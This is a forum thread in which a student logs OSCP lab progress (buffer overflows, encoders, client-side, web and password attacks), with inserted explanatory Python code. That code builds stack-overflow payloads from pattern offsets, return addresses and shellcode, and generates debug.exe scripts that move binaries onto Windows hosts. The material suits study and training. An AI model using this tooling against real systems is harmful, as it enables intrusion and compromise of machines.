Need a project - Found a project! YFZblu's OSCP Thread


  • YFZblu Member Posts: 1,462
    JoJoCal19 wrote:
    That just blew my mind. Even though I have no desire to be a straight pentester, that's the kind of stuff that intrigues me and makes me want to pursue the OSCP. Partly for self gratification and partly because I'd like to at least have some job duties to take advantage of doing that sort of thing. Thanks for the update.
    exe2bat blew my mind as well, really interesting tool
  • YFZblu Member Posts: 1,462
    Today I grabbed a 5 subject notebook - I'll be splitting it into sections and it will act as a command/tools reference for certain stages of engagement - recon, exploitation, file transfer, privilege escalation, etc etc. That way I don't have to keep referring to the book each time I need the command to do something.
  • wes allen Member Posts: 540
    I had a sublime text tab open with a bunch of common commands, commented like code with ## above them.

    RTFM book is a nice reference as well.
  • YFZblu Member Posts: 1,462
    Actually, Sublime Text is a much better idea. That way I can copy pasta some of the obvious stuff.

    Minor rant about reverting my Windows lab machine:
    Sorry, no more reverts left, please contact an administrator or staff member

    Is there a good reason for this? I feel like reverting the box should be a non-issue. Basically, as I fumble around Immunity Debugger like an idiot, I might accidentally close one of the windows or get them re-arranged; and therefore unreadable. I wasn't able to find a way to put them back to the default settings, so I had to revert the machine several times. I don't know, that kind of irritated me tonight. I also don't like the way VMWare Player is behaving when running Ubuntu as the host operating system. I typically use Virtualbox and never had issues. I used VMWare Player only because the Offsec docs specified a VMWare image.

    /rant

    I spent a couple hours re-reading the buffer overflow module and completing the activities. The study time I put into C and some light assembly reading definitely paid off, I feel good about it. I even found myself being slightly resourceful when I noticed msfencode was trying to encode my shellcode in something powershell related by default - It made my payload far too large for the buffer I created in the vulnerable application. Using the -e flag I was able to specify the 'x86/shikata_ga_nai' encoder and things worked out. I didn't have that issue the first time around several weeks ago.

    Anyway, I think I'm beat for the night. Tomorrow I'll dig into client-side recon / attacks and post another update.
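The encoder problem described in the post above comes down to size bookkeeping: after the padding that reaches the saved return address and the four bytes that overwrite it, only what is left of the vulnerable buffer can hold the NOP sled and the encoded shellcode. The following is an added example, not code from the course or from the poster. It uses the same `Aa0Aa1...` pattern scheme as Metasploit's `pattern_create`/`pattern_offset` to find the offset, then builds the buffer and refuses to proceed when the shellcode would not fit or contains a bad character. Every number in it (offset, gadget address, buffer length, the `0xCC` stub standing in for shellcode) is constructed for illustration and corresponds to no real target.

```python
"""
Stack-overflow payload builder with the size check behind the msfencode
problem above. Added example, not from the course or the poster; all
addresses and lengths here are made up.
"""
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits

PATTERN_MAX = 26 * 26 * 10 * 3  # the 'Aa0Aa1...' scheme yields 20280 unique bytes


def cyclic_pattern(length: int) -> bytes:
    """Same scheme as Metasploit's pattern_create: non-repeating 3-byte triples."""
    if length > PATTERN_MAX:
        raise ValueError("pattern scheme exhausted; use a longer-period generator")
    pat = "".join(u + l + d for u, l, d in product(ascii_uppercase, ascii_lowercase, digits))
    return pat[:length].encode()


def eip_to_offset(eip: int) -> int:
    """Given the EIP value the debugger shows after the crash (a little-endian
    dword taken from the pattern), return how many bytes precede the saved
    return address. Mirrors pattern_offset."""
    needle = struct.pack("<I", eip)
    idx = cyclic_pattern(PATTERN_MAX).find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern; was EIP fully overwritten?")
    return idx


def build_payload(offset: int, jmp_esp: int, shellcode: bytes, total_len: int,
                  nop_sled: int = 16, bad_chars: bytes = b"\x00\x0a\x0d") -> bytes:
    """
    Layout: [offset bytes of padding][JMP ESP address][NOP sled][shellcode][filler]

    offset    -- bytes before the saved return address (from eip_to_offset)
    jmp_esp   -- address of a JMP ESP gadget, packed little-endian
    total_len -- size of the buffer the vulnerable copy accepts
    Raises ValueError if the shellcode does not fit or a bad character appears.
    """
    ret = struct.pack("<I", jmp_esp)
    for part, name in ((ret, "return address"), (shellcode, "shellcode")):
        bad = [b for b in bad_chars if b in part]
        if bad:
            raise ValueError(f"{name} contains bad chars: {[hex(b) for b in bad]}")
    room = total_len - offset - len(ret) - nop_sled
    if room < 0 or len(shellcode) > room:
        raise ValueError(f"shellcode is {len(shellcode)} bytes but only {max(room, 0)} "
                         "remain after the return address and NOP sled; "
                         "pick a smaller payload or a different encoder")
    filler = b"C" * (room - len(shellcode))
    return b"A" * offset + ret + b"\x90" * nop_sled + shellcode + filler


if __name__ == "__main__":
    # Constructed values: a 600-byte buffer, EIP overwritten after 300 bytes,
    # a made-up JMP ESP address, and 32 INT3 bytes standing in for shellcode.
    offset = eip_to_offset(struct.unpack("<I", cyclic_pattern(600)[300:304])[0])
    payload = build_payload(offset, 0x10203040, b"\xcc" * 32, 600)
    print(f"offset={offset} payload_len={len(payload)}")
    try:
        build_payload(offset, 0x10203040, b"\xcc" * 400, 600)
    except ValueError as exc:
        print("too large:", exc)
```

The second `build_payload` call reproduces the failure mode from the post: a 400-byte encoded payload cannot fit in the 284 bytes that remain, so the builder refuses instead of silently truncating the shellcode.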
  • NovaHax Member Posts: 502
    Totally agree man. I understand them rate limiting your reverts on shared lab boxes...but I don't see any reason why you should be restricted on your dedicated Windows VM.
  • YFZblu Member Posts: 1,462
    So, back when I originally started this training, I wasn't that comfortable with the buffer overflow portion of the program. As a result, after the buffer overflow walkthroughs were completed, I skipped the exercise that asked me to take PoC code, modify it to work, and compromise my Windows lab workstation running a vulnerable process (VulnServer.exe). That was bothering me because I felt dishonest in moving on. I also feared that I might skip other modules as the course wore on...so I went back and tackled the exercises - watching the remote shell pop up on my Kali machine was one of the more gratifying things I've experienced while studying anything.

    If it sounds like I'm going forward, then losing ground, then going forward again, I think the problem is that I never moved forward to begin with. I consider myself to be a technical person, and I wasn't being honest with myself when confusion set in early on. Ultimately, I think I underestimated this course big time and it humbled me.

    I finally feel like the hard work is paying off, and I'm beginning to understand the 'Try Harder' mindset. At this point I'm more determined than ever to master the material and eventually pass this exam.
  • cyberguypr Mod Posts: 6,928
    That's great. Keep momentum going!
  • YFZblu Member Posts: 1,462
    Thanks for the kind words everyone - I'm plugging along again tonight, this time modifying the ready-made C exploits for the buffer overflow exercises. Even though I know exactly what these exploits are doing because of the previous lab with Python, it takes some tweaking to slog through the C code and modify it for my environment. OffSec drives home the point that even though PoC exploit code is available online, it will take some 'massaging' to make it work for my target.

    I was fortunate to have some knowledge of C going in; which makes this less painful than it would have been otherwise in terms of understanding what the code is doing - As opposed to just subbing my own shellcode in and pressing the button without actually 'getting it'. There's plenty of time for mindlessly glossing over the code during the Java exercises later...*barf*

    Again, seeing the reverse shell pop up on my Kali box was extremely rewarding. Additionally, compiling and executing a Windows binary from my Linux box was really cool.
  • YFZblu Member Posts: 1,462
    Read through the file transfer portion of the post-exploitation module. Next up: Client-side attacks.

    I don't think I'm going to do much tonight, I'm feeling pretty tired and burnt out. Time for a break!
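The file transfer module just mentioned, and the exe2bat tool praised earlier in the thread, both rest on the same trick: when the only channel to an old Windows host is a command shell, a binary can be recreated by echoing a script for the built-in 16-bit `debug.exe` (`n` names the output file, each `e` line enters bytes at an offset from `0100`, `rcx` sets the byte count and `w` writes that many bytes out). The code below is an added example that re-implements that idea; it is not exe2bat's own code, and the output file name `1.dd` and the exact line layout are this example's choices, since debug accepts several equivalent forms. It also includes a parser that reassembles the bytes a script would write, so the generator can be checked before anything is typed into a target. Stated as assumptions: `debug.exe` exists only on 32-bit Windows, and because `rcx` sets a single 16-bit register the file has to fit in the 64 KiB segment below `0x10000`.

```python
"""
DEBUG.EXE script generator in the spirit of exe2bat. Added example, not the
tool's own code. Assumptions: the target has 16-bit debug.exe (32-bit
Windows) and the binary is small enough to fit in one 64 KiB segment.
"""

LOAD_ADDR = 0x100                 # debug enters/writes file data starting at CS:0100
MAX_BYTES = 0x10000 - LOAD_ADDR   # largest file a single 'rcx' count can cover


def debug_script(data: bytes, out_name: str) -> list:
    """Return the debug.exe command lines that recreate `data` as `out_name`."""
    if not data:
        raise ValueError("nothing to transfer")
    if len(data) > MAX_BYTES:
        raise ValueError(f"{len(data)} bytes exceeds the {MAX_BYTES}-byte limit of this method")
    lines = [f"n {out_name}"]
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        lines.append(f"e {LOAD_ADDR + off:04x} " + " ".join(f"{b:02x}" for b in chunk))
    lines += ["rcx", f"{len(data):x}", "w", "q"]
    return lines


def to_echo_batch(lines: list, script_name: str = "1.dd") -> list:
    """Wrap each script line as an 'echo ... >>file' command for cmd.exe,
    followed by the command that feeds the script to debug."""
    cmds = [f"echo {line}>>{script_name}" for line in lines]
    cmds.append(f"debug<{script_name}")
    return cmds


def parse_debug_script(lines: list) -> bytes:
    """Reassemble the bytes a generated script would write (round-trip check)."""
    buf = bytearray()
    size = None
    it = iter(lines)
    for line in it:
        parts = line.split()
        if parts[0] == "e":
            off = int(parts[1], 16) - LOAD_ADDR
            if off != len(buf):
                raise ValueError(f"non-contiguous 'e' block at {parts[1]}")
            buf += bytes(int(h, 16) for h in parts[2:])
        elif parts[0] == "rcx":
            size = int(next(it), 16)   # the hex value on the following line
    if size is None:
        raise ValueError("script never set CX; debug would write 0 bytes")
    return bytes(buf[:size])


if __name__ == "__main__":
    # Constructed sample: a 514-byte blob, not a real executable.
    sample = bytes(range(256)) * 2 + b"MZ"
    script = debug_script(sample, "out.exe")
    assert parse_debug_script(script) == sample
    for cmd in to_echo_batch(script)[:3] + ["..."] + to_echo_batch(script)[-5:]:
        print(cmd)
```

Each `e` line carries 16 bytes, so a file of a few tens of kilobytes becomes a few thousand echo commands; that is why the technique is slow and why the size cap matters.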
  • YFZblu Member Posts: 1,462
    Woke up early on one of my days off - I'm hoping to kill a large portion of the training over the next few days. That way I can take several days to get some scripts together to automate the process of recon and complete the writeup of my exercises. At this point I'd rather not purchase another extension - I do have plenty of time, approximately 20 days.
  • MSP-IT Member Posts: 752
    Are we required to complete a writeup for all of the lab machines or just the exam alone?
  • Killj0y Member Posts: 39
    Both really. It is supposed to help for extra credit on the exam.
    Certifications: GPEN, SMFE, CISSP, OSCE, OSCP, OSWP, Security+, CEHv6, MCSE+Sec:2003
  • YFZblu Member Posts: 1,462
    Yeah - I actually read an OSCP blog that stated people have passed the exam even though they didn't technically score enough points during the test because their extra credit gave them the necessary bump. Obviously that's not an ideal situation, but I'd like every point possible.
  • MSP-IT Member Posts: 752
    Makes sense. I don't have my materials in front of me for reference.
  • YFZblu Member Posts: 1,462
    Completed the privilege escalation module - Very basic IMO, but provides a solid thought process you can go through to get things started. I'm sure an entire book can be written about escalation alone.

    Next up is client-side recon and attacks, which should be a nice read. It looks like there's a Java payload in here, which I see at work quite a bit in the context of drive-by downloads and exploit kit interaction.
  • YFZblu Member Posts: 1,462
    Finished up client-side attacks. I must say, I really hate working with Java. Creating a malicious Java applet was the one exercise in which I didn't care to ask "why?", or really have interest in what it was actually doing at a lower level. I'm happy to be over it. At work I have done some research which included a Java downloader, and for some reason it always leaves a bad taste in my mouth. That being said, it's important to recognize the value of another tool for the toolbox.

    Also it appears the Offsec book contains a typo. Java executes 'cmd /c' at one point, but the 'c' parameter should be capitalized. My payload wasn't running and it took me a bit to find that.
  • ramrunner800 Member Posts: 238
    YFZblu wrote:
    Also it appears the Offsec book contains a typo. Java executes 'cmd /c' at one point, but the 'c' parameter should be capitalized. My payload wasn't running and it took me a bit to find that.

    I'm not at that exercise yet, but I'm not a Java guy, and I have a feeling that is going to be an extremely valuable piece of information. Thank you!
    Currently Studying For: GXPN
  • wes allen Member Posts: 540
    YFZblu wrote:
    Also it appears the Offsec book contains a typo. Java executes 'cmd /c' at one point, but the 'c' parameter should be capitalized. My payload wasn't running and it took me a bit to find that.

    You sure it is a typo and not a learning opportunity? The FTP script for PWB also had a "typo" in it as well.
  • MSP-IT Member Posts: 752
    OffSec loves "learning opportunities"
  • YFZblu Member Posts: 1,462
    wes allen wrote:
    You sure it is a typo and not a learning opportunity? The FTP script for PWB also had a "typo" in it as well.
    You're right, I have encountered that situation a few times now - I can see that being the case
  • YFZblu Member Posts: 1,462
    Ran a few errands this morning, I have a few hours to dig in - I'm going to get started with Web Application Attacks
  • YFZblu Member Posts: 1,462
    Local File Inclusion was another exciting moment for me, similar to the Buffer Overflow module. Mostly because of the method by which we inject our own code into the web server's file system. Really clever.
  • YFZblu Member Posts: 1,462
    I got a bit hung up on SQL Injection - I'm probably fried. Going to call it a night, and restart SQLi tomorrow.
  • MSP-IT Member Posts: 752
    What did you think of the buffer overflow and reverse payload script? I'll definitely need to go through that one more than once.
  • YFZblu Member Posts: 1,462
    Loved it - It was the first really humbling experience I had and is quite literally the reason I stopped. Eventually I got my head together and went back at it, was able to digest it and complete all of the exercises. Great feeling!
  • YFZblu Member Posts: 1,462
    Chipping away at SQLi again today. A fresh state of mind really helps, I'm clicking along nicely.
  • YFZblu Member Posts: 1,462
    Unfortunately I did not get SQLi done yesterday - I'm working all day today (bleh), and I'll finish it tonight. From there, we get into password attacks.
  • YFZblu Member Posts: 1,462
    I got antsy with a slow day at work - Went home, grabbed my Macbook Air / OffSec materials, and decided to try to tether my phone to use the lab environment - So far so good. DL speed of 12Mbps (per speedtest.net) isn't terrible, I'll let you all know if it holds.
  • YFZblu Member Posts: 1,462
    Finished up SQLi today, I actually got a lot done at work this afternoon and tethering on my phone worked really well in a pinch.
  • YFZblu Member Posts: 1,462
    Finished the first exercises for Password Attacks. I'm pretty sure I just felt the moment my brain melted; I've been at this all day. Shutting it down.